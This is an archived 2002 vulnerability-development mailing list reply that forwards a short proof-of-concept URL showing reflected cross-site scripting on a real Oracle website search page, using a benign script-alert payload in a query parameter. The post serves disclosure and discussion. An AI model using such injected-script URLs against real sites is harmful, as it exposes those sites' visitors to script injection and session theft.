Vulnerability Development mailing list archives
Re: Oracle Databases Allow HTML/SQL injection
From: KF <dotslash () snosoft com>
Date: Tue, 16 Apr 2002 11:58:17 -0700
Looks like we stumbled on the same thing... Snosoft was gonna send this out with our april fools stuff...
--- Begin Forwarded message ---- On Mon, 1 Apr 2002, l0rt wrote:
dots cross site scripting of oracle baby... ;o) ain't he sexy.-l0rt-
> HEH > > http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=%3Cscript%3Ealert(%27hi%27)%3C/script%3E&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200 > > -KF
Current thread:
- Oracle Databases Allow HTML/SQL injection david evlis reign (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection KF (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection KF (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection Jim Kovalchuk (Apr 16)